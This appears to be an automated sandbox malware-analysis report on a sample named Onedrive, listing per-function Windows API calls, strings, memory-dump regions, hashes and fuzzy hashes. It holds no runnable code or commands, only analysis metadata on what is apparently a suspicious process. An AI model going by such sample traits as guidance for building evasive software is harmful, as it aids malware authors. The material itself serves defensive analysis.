SLGetWindowsInformation.SLC ref: 00007FF6104FC293
GetProcessHeap.KERNEL32 ref: 00007FF6104FC396
HeapFree.KERNEL32 ref: 00007FF6104FC3AB
GetProcessHeap.KERNEL32 ref: 00007FF6104FC3C3
HeapFree.KERNEL32 ref: 00007FF6104FC3D8
LocalFree.KERNEL32 ref: 00007FF6104FC3F5

Strings

Security-SPP-Action-StateData, xrefs: 00007FF6104FC28C

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Free$Process$InformationLocalWindowsmemset
String ID: Security-SPP-Action-StateData
API String ID: 2630303489-3551652513
Opcode ID: 7699336b6b7f282b642f77ab4554ed0c2efedfc1209a31443493f7247048ebea
Instruction ID: 1b9da88f938cac59189f76d94afc0440a5841bd56b3166c5507f3ba436cce235
Opcode Fuzzy Hash: 7699336b6b7f282b642f77ab4554ed0c2efedfc1209a31443493f7247048ebea
Instruction Fuzzy Hash: 1F51E332E08E46E6EF109B6995803BD63A4FF89BA4F458131DA0EC7389DF3CE5158780

Function 00007FF6104FACA4 Relevance: 12.7, APIs: 10, Instructions: 197memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104FAC14: _vsnwprintf.MSVCRT ref: 00007FF6104FAC51

GetProcessHeap.KERNEL32 ref: 00007FF6104FAD7F
HeapFree.KERNEL32 ref: 00007FF6104FAD93
GetProcessHeap.KERNEL32 ref: 00007FF6104FADA1
HeapAlloc.KERNEL32 ref: 00007FF6104FADB5
GetProcessHeap.KERNEL32 ref: 00007FF6104FADC9
HeapFree.KERNEL32 ref: 00007FF6104FADDD

Part of subcall function 00007FF6104F5CEC: GetProcessHeap.KERNEL32 ref: 00007FF6104F5E2B
Part of subcall function 00007FF6104F5CEC: HeapFree.KERNEL32 ref: 00007FF6104F5E3F

GetProcessHeap.KERNEL32 ref: 00007FF6104FAECB
HeapFree.KERNEL32 ref: 00007FF6104FAEE0
GetProcessHeap.KERNEL32 ref: 00007FF6104FAEF8
HeapFree.KERNEL32 ref: 00007FF6104FAF0C

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Alloc_vsnwprintf
String ID:
API String ID: 869350258-0
Opcode ID: a95e66a2d486a7de2bc33df1643f9172f06d30cbe7a2b837ad745425032e1045
Instruction ID: da425948d6ad7f9796ce820294dc5d755b7deb26eea4c97bf915ee1ebea02e25
Opcode Fuzzy Hash: a95e66a2d486a7de2bc33df1643f9172f06d30cbe7a2b837ad745425032e1045
Instruction Fuzzy Hash: E2710422A08E53E7FE246B6964841BD7699AF89FA4F058034DE0ED7395EE3CF4218340

Function 00007FF8A031A310 Relevance: 11.5, Strings: 9, Instructions: 289COMMON

Download Yara Rule

Strings

%hs located at 0x%p is %Iu bytes long., xrefs: 00007FF8A031A844
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A578
%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A7D2
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A426
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FF8A031A48E
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 00007FF8A031A705
DAMAGED, xrefs: 00007FF8A031A365
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00007FF8A031A6CE
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FF8A031A5E0

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %hs located at 0x%p is %Iu bytes long.$%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
API String ID: 0-1381456093
Opcode ID: 407bbe65323f13c1446eca2a6ba213da027fc83528b946b518c18121b60aee1a
Instruction ID: ee490d0978a755683b5dc33bccaaf6aa518795b62a5744d596e33219284df9f8
Opcode Fuzzy Hash: 407bbe65323f13c1446eca2a6ba213da027fc83528b946b518c18121b60aee1a
Instruction Fuzzy Hash: 0DE1F936A09F8696DB74CB29E48179AB7A0F78C791F100536EB9D87B68DF7CD4508B00

Function 00007FF6104FE048 Relevance: 11.4, APIs: 9, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE0D0
HeapAlloc.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE0E4
memmove.MSVCRT(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE112
GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE13B
HeapFree.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE150
GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE186
HeapFree.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE19A
GetProcessHeap.KERNEL32(?,?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE1C7
HeapFree.KERNEL32(?,80070057,00007FF6104FD826,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104FE1DB

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Process$Free$Allocmemmove
String ID:
API String ID: 3442027419-0
Opcode ID: 88bed13c918e7fb80d26cd8213454f113ac0d062ba6505f9c94ab16fab29db0b
Instruction ID: d19945aa1e6bc9c561a62d598cff875d2829cca803e7fa132a2345752d79e1b8
Opcode Fuzzy Hash: 88bed13c918e7fb80d26cd8213454f113ac0d062ba6505f9c94ab16fab29db0b
Instruction Fuzzy Hash: 0F417F31A08E82D6EE249F5BA54017ABAA5FF89FE5B098038DE0E87755DF3CE4118301

Function 00007FF6104F7010 Relevance: 10.6, APIs: 7, Instructions: 117memorythreadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F9CD8: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA00D
Part of subcall function 00007FF6104F9CD8: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA022
Part of subcall function 00007FF6104F9CD8: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6104F704B), ref: 00007FF6104FA036

SysFreeString.OLEAUT32 ref: 00007FF6104F714D
GetProcessHeap.KERNEL32 ref: 00007FF6104F715E
HeapFree.KERNEL32 ref: 00007FF6104F7173
PostThreadMessageW.USER32 ref: 00007FF6104F7194

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: FreeHeap$Process$LocalMessagePostStringThread
String ID:
API String ID: 4078191539-0
Opcode ID: 2c7ef42b2d75275cada80261cee81969b4e4b5e5a8e0757516f127fcc49ae481
Instruction ID: 0c0ca5a73bd7b18db102d099f3306d69441367001d226fc8b32b679c95546b2f
Opcode Fuzzy Hash: 2c7ef42b2d75275cada80261cee81969b4e4b5e5a8e0757516f127fcc49ae481
Instruction Fuzzy Hash: 3441E021A0CE82EAFE109B29A5901BDB7A9FF89FA4F158135DA0EC7745DE3DE4548300

Function 00007FF8A0302830 Relevance: 10.6, APIs: 7, Instructions: 83COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A0302841
RtlCaptureContext.KERNEL32 ref: 00007FF8A030287C
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A030289C
RtlVirtualUnwind.KERNEL32 ref: 00007FF8A03028EA
IsDebuggerPresent.KERNEL32 ref: 00007FF8A030294F
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A030298B
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A0302996

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 71c0df9b308b973dc3944309ceeef931511b359d5768c892c0b51a9535b78438
Instruction ID: 603bc0b97c7c55cd7401fb33c01dbc2bf183727e3008593c3b9cd4c793c53928
Opcode Fuzzy Hash: 71c0df9b308b973dc3944309ceeef931511b359d5768c892c0b51a9535b78438
Instruction Fuzzy Hash: 4341283660EF8296E7608B54F4443AAB7A5F789781F508136DACD47BA8EF3DC554CB00

Function 00007FF6104FD98C Relevance: 10.2, APIs: 8, Instructions: 190memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDA5B
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDA6F
GetProcessHeap.KERNEL32(?,?,?,00000000), ref: 00007FF6104FDA90
HeapFree.KERNEL32(?,?,?,00000000), ref: 00007FF6104FDAA4
GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDBCA
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDBDE
GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDBEF
HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FC83D), ref: 00007FF6104FDC03

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 08ebd22da5110395b74469f9ffbac05240c56cf53d5b8b387743d881b31d9734
Instruction ID: 621a01d7189d575e05372acec06f1545b28f059e216ef40b894e51a24d050e71
Opcode Fuzzy Hash: 08ebd22da5110395b74469f9ffbac05240c56cf53d5b8b387743d881b31d9734
Instruction Fuzzy Hash: 7B71B221F08E52DAEF04AF6994841BC36A9BF48FA4F454539EE5ED3798DF38E9158300

Function 00007FF6104FEDA4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF6104FEDD4
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6104FEDE2
GetCurrentThreadId.KERNEL32 ref: 00007FF6104FEDEE
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF6104FEDFA
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF6104FEE0A
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 00007FF6104FEE25

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
Instruction ID: 4dc989d276982d9ae083a8cfcbbc86cd2ee0f53c1dea6b9ff5302a7b16aa1861
Opcode Fuzzy Hash: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
Instruction Fuzzy Hash: 74111F36608F429AEF10DF61E8552A833A4FB58B6CF400A35EA6DC7B58EF7CD5648344

Function 00007FF8A031C6DE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

HeapValidate.KERNEL32 ref: 00007FF8A031C7C6
__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031C806

Strings

Cycle in block list detected while processing block located at 0x%p., xrefs: 00007FF8A031C746
Heap validation failed., xrefs: 00007FF8A031C7D0
I', xrefs: 00007FF8A031C7F2

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: HeapValidate__vcrt_lock
String ID: Cycle in block list detected while processing block located at 0x%p.$Heap validation failed.$I'
API String ID: 504802999-730636035
Opcode ID: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
Instruction ID: 1dd3f83e471fc15c00b6ac7e459e84a395dc58f19a9c85a1932b37e0a01dabee
Opcode Fuzzy Hash: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
Instruction Fuzzy Hash: 5931533662EF8696EB608B29E08072A77A0F7897D1F104435E78D47BA4DF7DD480CB00

Function 00007FF8A031DC60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

__crtCaptureCurrentContext.LIBCMTD ref: 00007FF8A031DCE1
IsDebuggerPresent.KERNEL32 ref: 00007FF8A031DD2D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A031DD39
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A031DD44

Strings

[!] 0x%0.8X Failed With Error: 0x%0.8X , xrefs: 00007FF8A031DC6D

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextCurrentDebuggerPresent__crt
String ID: [!] 0x%0.8X Failed With Error: 0x%0.8X
API String ID: 3997116924-2773923016
Opcode ID: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
Instruction ID: 1cc68df2f83f1ad46caa16963ebf2ac56efcba91fa5ca99be2408712887c4c5e
Opcode Fuzzy Hash: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
Instruction Fuzzy Hash: 8C31B73650AFC29AE770DB14E8443ABB7A0FB89395F505636D68D52BA8EF3CD5448F00

Function 0000021BD8F958AF Relevance: 8.4, Strings: 6, Instructions: 942COMMON

Download Yara Rule

Strings

, xrefs: 0000021BD8F96353
8, xrefs: 0000021BD8F9614E
#, xrefs: 0000021BD8F95D0D
, xrefs: 0000021BD8F95A10
8, xrefs: 0000021BD8F95FC8
d, xrefs: 0000021BD8F95C05

Memory Dump Source

Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd

Similarity

API ID:
String ID: $ $#$8$8$d
API String ID: 0-424029278
Opcode ID: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
Instruction ID: d7bb335b9f0b8bffa6d40c5149898dea88ff21db59ad0da650687c1eb924bf0f
Opcode Fuzzy Hash: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
Instruction Fuzzy Hash: 5872C130518B488FEBA9EF08D459BEEB7E1FB98705F544ABDC18DC7291DB3494418B82

Function 00007FF6104F4B14 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F4A80: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF6104F4B32), ref: 00007FF6104F4AAB
Part of subcall function 00007FF6104F4A80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF6104F4B32), ref: 00007FF6104F4ABC

FindResourceExW.KERNEL32 ref: 00007FF6104F4B56
GetLastError.KERNEL32 ref: 00007FF6104F4B67

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: ErrorLast$FindQueryResourceVirtual
String ID:
API String ID: 571639142-0
Opcode ID: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
Instruction ID: 680f90b892a3e7d844f617c32184fc3a0aa273299f61018b33134a9888dc399e
Opcode Fuzzy Hash: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
Instruction Fuzzy Hash: 17216121F08E92D2EF105B69A49027D66E4EFC9FA4B548534DA0EC7796EE2DF8208704

Function 00007FF8A0303190 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A030319B
UnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A03031A6
GetCurrentProcess.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A03031AC
TerminateProcess.KERNEL32(?,?,?,?,00007FF8A030329D,?,?,?,?,?,?,00007FF8A031EFA0), ref: 00007FF8A03031BA

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
Instruction ID: 7ad6bfdc27aff673287409c59271989085bb7fb2640dcb353d1f703a4abbe5f1
Opcode Fuzzy Hash: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
Instruction Fuzzy Hash: E3D06229D1AE4396D6046B61E8590292260FB99B82F91D435DA4F19724DE3DD4598600

Function 0000021BD8F9764F Relevance: 5.3, Strings: 4, Instructions: 322COMMON

Download Yara Rule

Strings

BM, xrefs: 0000021BD8F977E8
, xrefs: 0000021BD8F978A3
(, xrefs: 0000021BD8F977AE
6, xrefs: 0000021BD8F977EF

Memory Dump Source

Source File: 00000003.00000003.2239529457.0000021BD8F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021BD8F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_21bd8f80000_Onedrive.jbxd

Similarity

API ID:
String ID: $($6$BM
API String ID: 0-1480521668
Opcode ID: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
Instruction ID: 91c38b8585092a5c22bfa9ef6fdbb2c103cf66f519c583b3c6d3f011139fb0f3
Opcode Fuzzy Hash: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
Instruction Fuzzy Hash: D0A18470208B488FEB64EF28D459BAAB7E1FBD9701F010569E589C7350DF74D841CB82

Function 00007FF8A03323A0 Relevance: 4.3, Strings: 3, Instructions: 551COMMON

Download Yara Rule

Strings

%ls, xrefs: 00007FF8A03323F6
minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h, xrefs: 00007FF8A033240B
("Division by zero", false), xrefs: 00007FF8A03323EA

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
API String ID: 0-226933
Opcode ID: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
Instruction ID: 6284864ff7f0e2c79f35c60ffb39af3d049e1536c0799a13e3b9d96deb223d60
Opcode Fuzzy Hash: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
Instruction Fuzzy Hash: 5352A776609A818FD7A4CF19E49076AB7A1F7C8784F108129E69EC7B58DB3DE845CF00

Function 00007FF6104F57D0 Relevance: 3.9, APIs: 3, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00007FF6104F5906
GetProcessHeap.KERNEL32 ref: 00007FF6104F5926
HeapFree.KERNEL32 ref: 00007FF6104F593B

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
